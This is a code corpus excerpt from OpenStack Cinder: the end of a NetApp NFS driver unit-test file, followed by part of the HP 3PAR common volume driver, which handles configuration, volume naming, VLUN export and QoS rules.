drv._get_ip_verify_on_cluster.assert_any_call('ip1')
drv._get_export_path.assert_called_with('vol_id')
drv._check_share_can_hold_size.assert_called_with('share', 1)
assert mock_cvrt_image.call_count == 1
assert drv._execute.call_count == 1
assert drv._delete_file.call_count == 2
drv._clone_file_dst_exists.call_count == 1
drv._post_clone_image.assert_called_with(volume)
class NetappDirect7modeNfsDriverTestCase(NetappDirectCmodeNfsDriverTestCase):
    """Test direct NetApp 7-mode NFS driver (inherits the C-mode tests)."""
    def _custom_setup(self):
        # Replace the parent's cDOT driver with a 7-mode one; the inherited
        # tests then exercise the 7-mode code paths.
        self._driver = netapp_nfs.NetAppDirect7modeNfsDriver(
            configuration=create_configuration())
    def _prepare_delete_snapshot_mock(self, snapshot_exists):
        """Record mox expectations for a delete-snapshot call.

        When snapshot_exists is True an 'rm' of the snapshot file is
        expected; otherwise the delete is a no-op after the presence check.
        """
        drv = self._driver
        mox = self.mox
        mox.StubOutWithMock(drv, '_get_provider_location')
        mox.StubOutWithMock(drv, '_volume_not_present')
        if snapshot_exists:
            mox.StubOutWithMock(drv, '_execute')
            mox.StubOutWithMock(drv, '_get_volume_path')
        drv._get_provider_location(IgnoreArg())
        drv._volume_not_present(IgnoreArg(), IgnoreArg())\
            .AndReturn(not snapshot_exists)
        if snapshot_exists:
            drv._get_volume_path(IgnoreArg(), IgnoreArg())
            drv._execute('rm', None, run_as_root=True)
        mox.ReplayAll()
        return mox
    def test_check_for_setup_error_version(self):
        """Setup check fails when the API version is missing or too old."""
        drv = self._driver
        drv._client = api.NaServer("127.0.0.1")
        # check exception raises when version not found
        self.assertRaises(exception.VolumeBackendAPIException,
                          drv.check_for_setup_error)
        drv._client.set_api_version(1, 8)
        # check exception raises when not supported version
        self.assertRaises(exception.VolumeBackendAPIException,
                          drv.check_for_setup_error)
    def test_check_for_setup_error(self):
        """Setup check demands every required netapp_* flag be set."""
        mox = self.mox
        drv = self._driver
        drv._client = api.NaServer("127.0.0.1")
        drv._client.set_api_version(1, 9)
        required_flags = [
            'netapp_transport_type',
            'netapp_login',
            'netapp_password',
            'netapp_server_hostname',
            'netapp_server_port']
        # set required flags
        for flag in required_flags:
            setattr(drv.configuration, flag, None)
        # check exception raises when flags are not set
        self.assertRaises(exception.CinderException,
                          drv.check_for_setup_error)
        # set required flags
        for flag in required_flags:
            setattr(drv.configuration, flag, 'val')
        mox.ReplayAll()
        drv.check_for_setup_error()
        mox.VerifyAll()
        # restore initial FLAGS
        for flag in required_flags:
            delattr(drv.configuration, flag)
    def test_do_setup(self):
        """do_setup delegates to the base class plus 7-mode custom setup."""
        mox = self.mox
        drv = self._driver
        mox.StubOutWithMock(netapp_nfs.NetAppNFSDriver, 'do_setup')
        mox.StubOutWithMock(drv, '_get_client')
        mox.StubOutWithMock(drv, '_do_custom_setup')
        netapp_nfs.NetAppNFSDriver.do_setup(IgnoreArg())
        drv._get_client()
        drv._do_custom_setup(IgnoreArg())
        mox.ReplayAll()
        drv.do_setup(IsA(context.RequestContext))
        mox.VerifyAll()
    def _prepare_clone_mock(self, status):
        """Record mox expectations for a clone.

        status 'fail' stages a NaApiError from the clone wait and expects
        _clear_clone to run as cleanup.
        """
        drv = self._driver
        mox = self.mox
        volume = FakeVolume()
        setattr(volume, 'provider_location', '127.0.0.1:/nfs')
        mox.StubOutWithMock(drv, '_get_export_ip_path')
        mox.StubOutWithMock(drv, '_get_actual_path_for_export')
        mox.StubOutWithMock(drv, '_start_clone')
        mox.StubOutWithMock(drv, '_wait_for_clone_finish')
        if status == 'fail':
            mox.StubOutWithMock(drv, '_clear_clone')
        drv._get_export_ip_path(
            IgnoreArg(), IgnoreArg()).AndReturn(('127.0.0.1', '/nfs'))
        drv._get_actual_path_for_export(IgnoreArg()).AndReturn('/vol/vol1/nfs')
        drv._start_clone(IgnoreArg(), IgnoreArg()).AndReturn(('1', '2'))
        if status == 'fail':
            drv._wait_for_clone_finish('1', '2').AndRaise(
                api.NaApiError('error', 'error'))
            drv._clear_clone('1')
        else:
            drv._wait_for_clone_finish('1', '2')
        return mox
    def test_clone_volume_clear(self):
        """A failed clone triggers _clear_clone cleanup."""
        drv = self._driver
        mox = self._prepare_clone_mock('fail')
        mox.ReplayAll()
        volume_name = 'volume_name'
        clone_name = 'clone_name'
        volume_id = volume_name + str(hash(volume_name))
        try:
            drv._clone_volume(volume_name, clone_name, volume_id)
        except Exception as e:
            # Only the NaApiError staged by the mock is tolerated here;
            # anything else is a genuine failure and is re-raised.
            if isinstance(e, api.NaApiError):
                pass
            else:
                raise
        mox.VerifyAll()
|
adelina-t/cinder | cinder/volume/drivers/san/hp/hp_3par_common.py | # (c) Copyright 2012-2014 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Volume driver common utilities for HP 3PAR Storage array
The 3PAR drivers requires 3.1.3 firmware on the 3PAR array.
You will need to install the python hp3parclient.
sudo pip install hp3parclient
The drivers uses both the REST service and the SSH
command line to correctly operate. Since the
ssh credentials and the REST credentials can be different
we need to have settings for both.
The drivers requires the use of the san_ip, san_login,
san_password settings for ssh connections into the 3PAR
array. It also requires the setting of
hp3par_api_url, hp3par_username, hp3par_password
for credentials to talk to the REST service on the 3PAR
array.
"""
import ast
import base64
import json
import math
import pprint
import re
import uuid
from cinder.openstack.common import importutils
hp3parclient = importutils.try_import("hp3parclient")
if hp3parclient:
from hp3parclient import client
from hp3parclient import exceptions as hpexceptions
from oslo.config import cfg
from cinder import context
from cinder import exception
from cinder.openstack.common import excutils
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder.openstack.common import loopingcall
from cinder.openstack.common import units
from cinder.volume import qos_specs
from cinder.volume import volume_types
LOG = logging.getLogger(__name__)

# Oldest hp3parclient release this driver-common code is known to work with.
MIN_CLIENT_VERSION = '3.0.0'

hp3par_opts = [
    cfg.StrOpt('hp3par_api_url',
               default='',
               help="3PAR WSAPI Server Url like "
                    "https://<3par ip>:8080/api/v1"),
    cfg.StrOpt('hp3par_username',
               default='',
               help="3PAR Super user username"),
    cfg.StrOpt('hp3par_password',
               default='',
               help="3PAR Super user password",
               secret=True),
    cfg.StrOpt('hp3par_cpg',
               default="OpenStack",
               help="The CPG to use for volume creation"),
    cfg.StrOpt('hp3par_cpg_snap',
               default="",
               help="The CPG to use for Snapshots for volumes. "
                    "If empty hp3par_cpg will be used"),
    cfg.StrOpt('hp3par_snapshot_retention',
               default="",
               help="The time in hours to retain a snapshot. "
                    "You can't delete it before this expires."),
    cfg.StrOpt('hp3par_snapshot_expiration',
               default="",
               # Fixed help text: it previously said "larger than
               # expiration" (self-referential) and had a double space.
               help="The time in hours when a snapshot expires "
                    "and is deleted. This must be larger than "
                    "hp3par_snapshot_retention."),
    cfg.BoolOpt('hp3par_debug',
                default=False,
                help="Enable HTTP debugging to 3PAR"),
    cfg.ListOpt('hp3par_iscsi_ips',
                default=[],
                help="List of target iSCSI addresses to use.")
]

CONF = cfg.CONF
CONF.register_opts(hp3par_opts)
class HP3PARCommon(object):
    """Class that contains common code for the 3PAR drivers.
    Version history:
        1.2.0 - Updated hp3parclient API use to 2.0.x
        1.2.1 - Check that the VVS exists
        1.2.2 - log prior to raising exceptions
        1.2.3 - Methods to update key/value pair bug #1258033
        1.2.4 - Remove deprecated config option hp3par_domain
        1.2.5 - Raise Ex when deleting snapshot with dependencies bug #1250249
        1.2.6 - Allow optional specifying n:s:p for vlun creation bug #1269515
                This update now requires 3.1.2 MU3 firmware
        1.3.0 - Removed all SSH code.  We rely on the hp3parclient now.
        2.0.0 - Update hp3parclient API uses 3.0.x
        2.0.1 - Updated to use qos_specs, added new qos settings and personas
        2.0.2 - Add back-end assisted volume migrate
        2.0.3 - Allow deleting missing snapshots bug #1283233
        2.0.4 - Allow volumes created from snapshots to be larger bug #1279478
        2.0.5 - Fix extend volume units bug #1284368
        2.0.6 - use loopingcall.wait instead of time.sleep
        2.0.7 - Allow extend volume based on snapshot bug #1285906
        2.0.8 - Fix detach issue for multiple hosts bug #1288927
        2.0.9 - Remove unused 3PAR driver method bug #1310807
        2.0.10 - Fixed an issue with 3PAR vlun location bug #1315542
        2.0.11 - Remove hp3parclient requirement from unit tests #1315195
        2.0.12 - Volume detach hangs when host is in a host set bug #1317134
        2.0.13 - Added support for managing/unmanaging of volumes
    """
    VERSION = "2.0.13"
    # Cached result of _update_volume_stats(); class-level default so
    # get_volume_stats(refresh=False) is safe before the first refresh.
    stats = {}
    # TODO(Ramy): move these to the 3PAR Client
    # VLUN template types as reported in a VLUN's 'type' field.
    VLUN_TYPE_EMPTY = 1
    VLUN_TYPE_PORT = 2
    VLUN_TYPE_HOST = 3
    VLUN_TYPE_MATCHED_SET = 4
    VLUN_TYPE_HOST_SET = 5
    # Valid values for volume type extra specs
    # The first value in the list is the default value
    valid_prov_values = ['thin', 'full']
    valid_persona_values = ['1 - Generic',
                            '2 - Generic-ALUA',
                            '6 - Generic-legacy',
                            '7 - HPUX-legacy',
                            '8 - AIX-legacy',
                            '9 - EGENERA',
                            '10 - ONTAP-legacy',
                            '11 - VMware',
                            '12 - OpenVMS',
                            '13 - HPUX',
                            '15 - WindowsServer']
    # QoS-related extra-spec keys recognized by _get_qos_by_volume_type().
    hp_qos_keys = ['minIOPS', 'maxIOPS', 'minBWS', 'maxBWS', 'latency',
                   'priority']
    qos_priority_level = {'low': 1, 'normal': 2, 'high': 3}
    # Extra-spec keys recognized by _get_keys_by_volume_type().
    hp3par_valid_keys = ['cpg', 'snap_cpg', 'provisioning', 'persona', 'vvs']
def __init__(self, config):
self.config = config
self.hosts_naming_dict = dict()
self.client = None
def get_version(self):
return self.VERSION
def check_flags(self, options, required_flags):
for flag in required_flags:
if not getattr(options, flag, None):
msg = _('%s is not set') % flag
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
def _create_client(self):
cl = client.HP3ParClient(self.config.hp3par_api_url)
client_version = hp3parclient.version
if (client_version < MIN_CLIENT_VERSION):
ex_msg = (_('Invalid hp3parclient version found (%(found)s). '
'Version %(minimum)s or greater required.')
% {'found': client_version,
'minimum': MIN_CLIENT_VERSION})
LOG.error(ex_msg)
raise exception.InvalidInput(reason=ex_msg)
cl.setSSHOptions(self.config.san_ip,
self.config.san_login,
self.config.san_password,
port=self.config.san_ssh_port,
conn_timeout=self.config.ssh_conn_timeout,
privatekey=self.config.san_private_key)
return cl
    def client_login(self):
        """Open a REST session on the array.

        Raises InvalidInput when the WSAPI rejects the credentials.
        """
        try:
            LOG.debug("Connecting to 3PAR")
            self.client.login(self.config.hp3par_username,
                              self.config.hp3par_password)
        except hpexceptions.HTTPUnauthorized as ex:
            msg = (_("Failed to Login to 3PAR (%(url)s) because %(err)s") %
                   {'url': self.config.hp3par_api_url, 'err': ex})
            LOG.error(msg)
            raise exception.InvalidInput(reason=msg)
    def client_logout(self):
        """Terminate the REST session with the array."""
        self.client.logout()
        LOG.debug("Disconnect from 3PAR")
    def do_setup(self, context):
        """Create the REST client and sanity-check the configured CPG.

        Raises VolumeBackendAPIException when hp3parclient is not
        installed and InvalidInput for unusable client versions or CPGs.
        """
        if hp3parclient is None:
            msg = _('You must install hp3parclient before using 3PAR drivers.')
            raise exception.VolumeBackendAPIException(data=msg)
        try:
            self.client = self._create_client()
        except hpexceptions.UnsupportedVersion as ex:
            raise exception.InvalidInput(ex)
        LOG.info(_("HP3PARCommon %(common_ver)s, hp3parclient %(rest_ver)s")
                 % {"common_ver": self.VERSION,
                    "rest_ver": hp3parclient.get_version_string()})
        if self.config.hp3par_debug:
            self.client.debug_rest(True)
        # Log in only long enough to validate the CPG; a session is opened
        # per operation elsewhere.
        self.client_login()
        try:
            # make sure the default CPG exists
            self.validate_cpg(self.config.hp3par_cpg)
        finally:
            self.client_logout()
def validate_cpg(self, cpg_name):
try:
self.client.getCPG(cpg_name)
except hpexceptions.HTTPNotFound:
err = (_("CPG (%s) doesn't exist on array") % cpg_name)
LOG.error(err)
raise exception.InvalidInput(reason=err)
def get_domain(self, cpg_name):
try:
cpg = self.client.getCPG(cpg_name)
except hpexceptions.HTTPNotFound:
err = (_("Failed to get domain because CPG (%s) doesn't "
"exist on array.") % cpg_name)
LOG.error(err)
raise exception.InvalidInput(reason=err)
if 'domain' in cpg:
return cpg['domain']
return None
def extend_volume(self, volume, new_size):
volume_name = self._get_3par_vol_name(volume['id'])
old_size = volume['size']
growth_size = int(new_size) - old_size
LOG.debug("Extending Volume %(vol)s from %(old)s to %(new)s, "
" by %(diff)s GB." %
{'vol': volume_name, 'old': old_size, 'new': new_size,
'diff': growth_size})
growth_size_mib = growth_size * units.Ki
self._extend_volume(volume, volume_name, growth_size_mib)
    def manage_existing(self, volume, existing_ref):
        """Manage an existing 3PAR volume.

        existing_ref is a dictionary of the form:
        {'name': <name of the virtual volume>}

        The array volume is renamed to the osv- name derived from the new
        Cinder id and its comment is rewritten with Cinder metadata.
        Returns {'display_name': ...} so the GUI name can be updated.
        """
        # Check for the existence of the virtual volume.
        try:
            vol = self.client.getVolume(existing_ref['name'])
        except hpexceptions.HTTPNotFound:
            err = (_("Virtual volume '%s' doesn't exist on array.") %
                   existing_ref['name'])
            LOG.error(err)
            raise exception.InvalidInput(reason=err)
        new_comment = {}
        # Use the display name from the existing volume if no new name
        # was chosen by the user.
        if volume['display_name']:
            display_name = volume['display_name']
            new_comment['display_name'] = volume['display_name']
        elif 'comment' in vol:
            # Fall back to the display_name stored in the 3PAR comment blob.
            display_name = self._get_3par_vol_comment_value(vol['comment'],
                                                            'display_name')
            if display_name:
                new_comment['display_name'] = display_name
        else:
            display_name = None
        # Generate the new volume information based off of the new ID.
        new_vol_name = self._get_3par_vol_name(volume['id'])
        name = 'volume-' + volume['id']
        new_comment['volume_id'] = volume['id']
        new_comment['name'] = name
        new_comment['type'] = 'OpenStack'
        # Create new comments for the existing volume depending on
        # whether the user's volume type choice.
        # TODO(Anthony) when retype is available handle retyping of
        # a volume.
        if volume['volume_type']:
            try:
                settings = self.get_volume_settings_from_type(volume)
            except Exception:
                reason = (_("Volume type ID '%s' is invalid.") %
                          volume['volume_type_id'])
                raise exception.ManageExistingVolumeTypeMismatch(reason=reason)
            volume_type = self._get_volume_type(volume['volume_type_id'])
            new_comment['volume_type_name'] = volume_type['name']
            new_comment['volume_type_id'] = volume['volume_type_id']
            new_comment['qos'] = settings['qos']
        # Update the existing volume with the new name and comments.
        self.client.modifyVolume(existing_ref['name'],
                                 {'newName': new_vol_name,
                                  'comment': json.dumps(new_comment)})
        LOG.info(_("Virtual volume '%(ref)s' renamed to '%(new)s'.") %
                 {'ref': existing_ref['name'], 'new': new_vol_name})
        LOG.info(_("Virtual volume %(disp)s '%(new)s' is now being managed.") %
                 {'disp': display_name, 'new': new_vol_name})
        # Return display name to update the name displayed in the GUI.
        return {'display_name': display_name}
    def manage_existing_get_size(self, volume, existing_ref):
        """Return size of volume to be managed by manage_existing.

        existing_ref is a dictionary of the form:
        {'name': <name of the virtual volume>}

        Raises ManageExistingInvalidReference for a missing name element
        or for an osv-/oss-/vvs- name (already Cinder-managed), and
        InvalidInput when the volume does not exist on the array.
        The size is rounded up to whole GiB.
        """
        # Check that a valid reference was provided.
        if 'name' not in existing_ref:
            reason = _("Reference must contain name element.")
            raise exception.ManageExistingInvalidReference(
                existing_ref=existing_ref,
                reason=reason)
        # Make sure the reference is not in use.
        if re.match('osv-*|oss-*|vvs-*', existing_ref['name']):
            reason = _("Reference must be for an unmanaged virtual volume.")
            raise exception.ManageExistingInvalidReference(
                existing_ref=existing_ref,
                reason=reason)
        # Check for the existence of the virtual volume.
        try:
            vol = self.client.getVolume(existing_ref['name'])
        except hpexceptions.HTTPNotFound:
            err = (_("Virtual volume '%s' doesn't exist on array.") %
                   existing_ref['name'])
            LOG.error(err)
            raise exception.InvalidInput(reason=err)
        # sizeMiB -> GiB, rounded up so we never under-report.
        return int(math.ceil(float(vol['sizeMiB']) / units.Ki))
    def unmanage(self, volume):
        """Removes the specified volume from Cinder management."""
        # Rename the volume's name to unm-* format so that it can be
        # easily found later.
        vol_name = self._get_3par_vol_name(volume['id'])
        new_vol_name = self._get_3par_unm_name(volume['id'])
        self.client.modifyVolume(vol_name, {'newName': new_vol_name})
        LOG.info(_("Virtual volume %(disp)s '%(vol)s' is no longer managed. "
                   "Volume renamed to '%(new)s'.") %
                 {'disp': volume['display_name'],
                  'vol': vol_name,
                  'new': new_vol_name})
    def _extend_volume(self, volume, volume_name, growth_size_mib,
                       _convert_to_base=False):
        """Grow volume_name by growth_size_mib MiB on the array.

        If the array refuses with HTTP 403 / error code 150 (this volume
        type cannot grow), convert the volume to a base volume once and
        retry; any other failure is logged and re-raised.
        """
        try:
            if _convert_to_base:
                LOG.debug("Converting to base volume prior to growing.")
                self._convert_to_base_volume(volume)
            self.client.growVolume(volume_name, growth_size_mib)
        except Exception as ex:
            with excutils.save_and_reraise_exception() as ex_ctxt:
                if (not _convert_to_base and
                        isinstance(ex, hpexceptions.HTTPForbidden) and
                        ex.get_code() == 150):
                    # Error code 150 means 'invalid operation: Cannot grow
                    # this type of volume'.
                    # Suppress raising this exception because we can
                    # resolve it by converting it into a base volume.
                    # Afterwards, extending the volume should succeed, or
                    # fail with a different exception/error code.
                    ex_ctxt.reraise = False
                    self._extend_volume(volume, volume_name,
                                        growth_size_mib,
                                        _convert_to_base=True)
                else:
                    LOG.error(_("Error extending volume: %(vol)s. "
                                "Exception: %(ex)s") %
                              {'vol': volume_name, 'ex': ex})
    def _get_3par_vol_name(self, volume_id):
        """Get converted 3PAR volume name.

        Converts the openstack volume id from
        ecffc30f-98cb-4cf5-85ee-d7309cc17cd2
        to
        osv-7P.DD5jLTPWF7tcwnMF80g

        We convert the 128 bits of the uuid into a 24 character long
        base64 encoded string to ensure we don't exceed the maximum
        allowed 31 character name limit on 3Par.

        We strip the padding '=' and replace + with .
        and / with -
        """
        volume_name = self._encode_name(volume_id)
        return "osv-%s" % volume_name
    def _get_3par_snap_name(self, snapshot_id):
        """Return the 'oss-' prefixed 3PAR name for a snapshot id."""
        snapshot_name = self._encode_name(snapshot_id)
        return "oss-%s" % snapshot_name
    def _get_3par_vvs_name(self, volume_id):
        """Return the 'vvs-' prefixed 3PAR name for a volume's VV set."""
        vvs_name = self._encode_name(volume_id)
        return "vvs-%s" % vvs_name
    def _get_3par_unm_name(self, volume_id):
        """Return the 'unm-' prefixed name used for unmanaged volumes."""
        unm_name = self._encode_name(volume_id)
        return "unm-%s" % unm_name
    def _encode_name(self, name):
        """Base64-pack a UUID string into a short, 3PAR-safe suffix.

        NOTE(review): relies on Python 2 semantics — b64encode returns a
        str there; under Python 3 the str-argument replace() calls would
        need a decode first. Confirm before porting.
        """
        uuid_str = name.replace("-", "")
        vol_uuid = uuid.UUID('urn:uuid:%s' % uuid_str)
        vol_encoded = base64.b64encode(vol_uuid.bytes)
        # 3par doesn't allow +, nor /
        vol_encoded = vol_encoded.replace('+', '.')
        vol_encoded = vol_encoded.replace('/', '-')
        # strip off the == as 3par doesn't like those.
        vol_encoded = vol_encoded.replace('=', '')
        return vol_encoded
    def _capacity_from_size(self, vol_size):
        """Convert a size in GB to the MiB capacity value 3PAR expects."""
        # because 3PAR volume sizes are in
        # Mebibytes, Gibibytes, not Megabytes.
        MB = 1000L
        MiB = 1.048576
        if int(vol_size) == 0:
            capacity = MB  # default: 1GB
        else:
            capacity = vol_size * MB
        # GB -> MB (decimal), then MB -> MiB.
        capacity = int(round(capacity / MiB))
        return capacity
    def _delete_3par_host(self, hostname):
        """Remove the named host object from the array."""
        self.client.deleteHost(hostname)
    def _create_3par_vlun(self, volume, hostname, nsp):
        """Create a VLUN on the array and return its parsed location info.

        When nsp is None the array auto-selects a port; otherwise the
        given n:s:p port position is used. Returns a dict with
        volume_name/lun_id/host_name (plus nsp when reported).

        NOTE(review): on an HTTPBadRequest whose description is not the
        cross-domain error, the exception is swallowed and None is
        returned implicitly — callers that index the result would then
        raise. Confirm this is intentional.
        """
        try:
            location = None
            if nsp is None:
                location = self.client.createVLUN(volume, hostname=hostname,
                                                  auto=True)
            else:
                port = self.build_portPos(nsp)
                location = self.client.createVLUN(volume, hostname=hostname,
                                                  auto=True, portPos=port)
            vlun_info = None
            if location:
                # The LUN id is returned as part of the location URI
                vlun = location.split(',')
                vlun_info = {'volume_name': vlun[0],
                             'lun_id': int(vlun[1]),
                             'host_name': vlun[2],
                             }
                if len(vlun) > 3:
                    vlun_info['nsp'] = vlun[3]
            return vlun_info
        except hpexceptions.HTTPBadRequest as e:
            if 'must be in the same domain' in e.get_description():
                LOG.error(e.get_description())
                raise exception.Invalid3PARDomain(err=e.get_description())
def _safe_hostname(self, hostname):
"""We have to use a safe hostname length for 3PAR host names."""
try:
index = hostname.index('.')
except ValueError:
# couldn't find it
index = len(hostname)
# we'll just chop this off for now.
if index > 23:
index = 23
return hostname[:index]
    def _get_3par_host(self, hostname):
        """Fetch the array's host object for hostname."""
        return self.client.getHost(hostname)
    def get_ports(self):
        """Return the raw port listing from the array."""
        return self.client.getPorts()
def get_active_target_ports(self):
ports = self.get_ports()
target_ports = []
for port in ports['members']:
if (
port['mode'] == self.client.PORT_MODE_TARGET and
port['linkState'] == self.client.PORT_STATE_READY
):
port['nsp'] = self.build_nsp(port['portPos'])
target_ports.append(port)
return target_ports
def get_active_fc_target_ports(self):
ports = self.get_active_target_ports()
fc_ports = []
for port in ports:
if port['protocol'] == self.client.PORT_PROTO_FC:
fc_ports.append(port)
return fc_ports
def get_active_iscsi_target_ports(self):
ports = self.get_active_target_ports()
iscsi_ports = []
for port in ports:
if port['protocol'] == self.client.PORT_PROTO_ISCSI:
iscsi_ports.append(port)
return iscsi_ports
def get_volume_stats(self, refresh):
if refresh:
self._update_volume_stats()
return self.stats
    def _update_volume_stats(self):
        """Refresh self.stats with capacity info for the configured CPG."""
        # const to convert MiB to GB
        const = 0.0009765625
        # storage_protocol and volume_backend_name are
        # set in the child classes
        stats = {'driver_version': '1.0',
                 'free_capacity_gb': 'unknown',
                 'reserved_percentage': 0,
                 'storage_protocol': None,
                 'total_capacity_gb': 'unknown',
                 'QoS_support': True,
                 'vendor_name': 'Hewlett-Packard',
                 'volume_backend_name': None}
        try:
            cpg = self.client.getCPG(self.config.hp3par_cpg)
            # A CPG without an SDGrowth limit can grow without bound.
            if 'limitMiB' not in cpg['SDGrowth']:
                total_capacity = 'infinite'
                free_capacity = 'infinite'
            else:
                total_capacity = int(cpg['SDGrowth']['limitMiB'] * const)
                free_capacity = int((cpg['SDGrowth']['limitMiB'] -
                                     cpg['UsrUsage']['usedMiB']) * const)
            stats['total_capacity_gb'] = total_capacity
            stats['free_capacity_gb'] = free_capacity
        except hpexceptions.HTTPNotFound:
            err = (_("CPG (%s) doesn't exist on array")
                   % self.config.hp3par_cpg)
            LOG.error(err)
            raise exception.InvalidInput(reason=err)
        info = self.client.getStorageSystemInfo()
        # location_info lets the scheduler recognize same-array migration.
        stats['location_info'] = ('HP3PARDriver:%(sys_id)s:%(dest_cpg)s' %
                                  {'sys_id': info['serialNumber'],
                                   'dest_cpg': self.config.safe_get(
                                       'hp3par_cpg')})
        self.stats = stats
def _get_vlun(self, volume_name, hostname, lun_id=None):
"""find a VLUN on a 3PAR host."""
vluns = self.client.getHostVLUNs(hostname)
found_vlun = None
for vlun in vluns:
if volume_name in vlun['volumeName']:
if lun_id:
if vlun['lun'] == lun_id:
found_vlun = vlun
break
else:
found_vlun = vlun
break
if found_vlun is None:
msg = (_("3PAR vlun %(name)s not found on host %(host)s") %
{'name': volume_name, 'host': hostname})
LOG.info(msg)
return found_vlun
def create_vlun(self, volume, host, nsp=None):
"""Create a VLUN.
In order to export a volume on a 3PAR box, we have to create a VLUN.
"""
volume_name = self._get_3par_vol_name(volume['id'])
vlun_info = self._create_3par_vlun(volume_name, host['name'], nsp)
return self._get_vlun(volume_name, host['name'], vlun_info['lun_id'])
    def delete_vlun(self, volume, hostname):
        """Delete the VLUN exporting volume to hostname.

        If that was the host's last VLUN for any volume, also try to
        delete the host itself (best effort; failures are only logged).
        """
        volume_name = self._get_3par_vol_name(volume['id'])
        vluns = self.client.getHostVLUNs(hostname)
        # for/else: the 'else' runs only when no matching vlun was found.
        for vlun in vluns:
            if volume_name in vlun['volumeName']:
                break
        else:
            msg = (
                _("3PAR vlun for volume %(name)s not found on host %(host)s") %
                {'name': volume_name, 'host': hostname})
            LOG.info(msg)
            return
        # VLUN Type of MATCHED_SET 4 requires the port to be provided
        if self.VLUN_TYPE_MATCHED_SET == vlun['type']:
            self.client.deleteVLUN(volume_name, vlun['lun'], hostname,
                                   vlun['portPos'])
        else:
            self.client.deleteVLUN(volume_name, vlun['lun'], hostname)
        # Determine if there are other volumes attached to the host.
        # This will determine whether we should try removing host from host set
        # and deleting the host.
        for vlun in vluns:
            if volume_name not in vlun['volumeName']:
                # Found another volume
                break
        else:
            # We deleted the last vlun, so try to delete the host too.
            # This check avoids the old unnecessary try/fail when vluns exist
            # but adds a minor race condition if a vlun is manually deleted
            # externally at precisely the wrong time. Worst case is leftover
            # host, so it is worth the unlikely risk.
            try:
                self._delete_3par_host(hostname)
                self._remove_hosts_naming_dict_host(hostname)
            except Exception as ex:
                # Any exception down here is only logged.  The vlun is deleted.
                # If the host is in a host set, the delete host will fail and
                # the host will remain in the host set.  This is desired
                # because cinder was not responsible for the host set
                # assignment.  The host set could be used outside of cinder
                # for future needs (e.g. export volume to host set).
                # The log info explains why the host was left alone.
                msg = (_("3PAR vlun for volume '%(name)s' was deleted, "
                         "but the host '%(host)s' was not deleted because: "
                         "%(reason)s") %
                       {'name': volume_name,
                        'host': hostname,
                        'reason': ex.get_description()})
                LOG.info(msg)
def _remove_hosts_naming_dict_host(self, hostname):
    """Drop the hosts_naming_dict entry whose value is *hostname*.

    When several keys map to the same host name, only the last one
    encountered is removed (matches the scan-without-break behaviour).
    """
    stale_key = None
    for key, mapped_name in self.hosts_naming_dict.items():
        if mapped_name == hostname:
            stale_key = key
    if stale_key is not None:
        del self.hosts_naming_dict[stale_key]
def _get_volume_type(self, type_id):
    """Look up a volume type by id using an admin context."""
    return volume_types.get_volume_type(context.get_admin_context(),
                                        type_id)

def _get_key_value(self, hp3par_keys, key, default=None):
    """Return hp3par_keys[key], or *default* when the mapping is None
    or the key is absent."""
    if hp3par_keys is None or key not in hp3par_keys:
        return default
    return hp3par_keys[key]

def _get_qos_value(self, qos, key, default=None):
    """Return qos[key], or *default* when the key is not present."""
    return qos[key] if key in qos else default
def _get_qos_by_volume_type(self, volume_type):
    """Build the QoS dict implied by *volume_type*.

    Only keys listed in self.hp_qos_keys are kept; 'qos:' scoped extra
    specs are unscoped first.

    :param volume_type: volume type dict ('qos_specs_id', 'extra_specs')
    :returns: dict of recognized QoS key -> value
    """
    qos = {}
    qos_specs_id = volume_type.get('qos_specs_id')
    specs = volume_type.get('extra_specs')

    # NOTE(kmartin): We prefer the qos_specs association
    # and override any existing extra-specs settings
    # if present.
    if qos_specs_id is not None:
        kvs = qos_specs.get_qos_specs(context.get_admin_context(),
                                      qos_specs_id)['specs']
    else:
        kvs = specs

    # items() instead of the Python-2-only iteritems(), consistent with
    # the .items() usage elsewhere in this module and Py3-compatible.
    for key, value in kvs.items():
        if 'qos:' in key:
            fields = key.split(':')
            key = fields[1]
        if key in self.hp_qos_keys:
            qos[key] = value
    return qos
def _get_keys_by_volume_type(self, volume_type):
    """Extract the hp3par-recognized keys from a type's extra specs.

    Scoped keys of the form '<scope>:<key>' are reduced to '<key>';
    only keys present in self.hp3par_valid_keys are returned.
    """
    hp3par_keys = {}
    specs = volume_type.get('extra_specs')
    # items() instead of the Python-2-only iteritems(), consistent with
    # the .items() usage elsewhere in this module and Py3-compatible.
    for key, value in specs.items():
        if ':' in key:
            fields = key.split(':')
            key = fields[1]
        if key in self.hp3par_valid_keys:
            hp3par_keys[key] = value
    return hp3par_keys
def _set_qos_rule(self, qos, vvs_name):
    """Create a 3PAR QoS rule on the volume set *vvs_name*.

    *qos* may contain minIOPS/maxIOPS/minBWS/maxBWS/latency/priority.
    When only one side of a min/max pair is supplied, the other side is
    set to the same value so the array receives a complete rule.
    """
    min_io = self._get_qos_value(qos, 'minIOPS')
    max_io = self._get_qos_value(qos, 'maxIOPS')
    min_bw = self._get_qos_value(qos, 'minBWS')
    max_bw = self._get_qos_value(qos, 'maxBWS')
    latency = self._get_qos_value(qos, 'latency')
    priority = self._get_qos_value(qos, 'priority', 'normal')

    qosRule = {}
    if min_io:
        qosRule['ioMinGoal'] = int(min_io)
        if max_io is None:
            # No explicit max: mirror the min goal as the limit.
            qosRule['ioMaxLimit'] = int(min_io)
    if max_io:
        qosRule['ioMaxLimit'] = int(max_io)
        if min_io is None:
            # No explicit min: mirror the max limit as the goal.
            qosRule['ioMinGoal'] = int(max_io)
    if min_bw:
        # Multiplied by units.Ki -- bandwidth appears to be given in
        # MB/s while the array expects KB/s (TODO confirm units).
        qosRule['bwMinGoalKB'] = int(min_bw) * units.Ki
        if max_bw is None:
            qosRule['bwMaxLimitKB'] = int(min_bw) * units.Ki
    if max_bw:
        qosRule['bwMaxLimitKB'] = int(max_bw) * units.Ki
        if min_bw is None:
            qosRule['bwMinGoalKB'] = int(max_bw) * units.Ki
    if latency:
        qosRule['latencyGoal'] = int(latency)
    if priority:
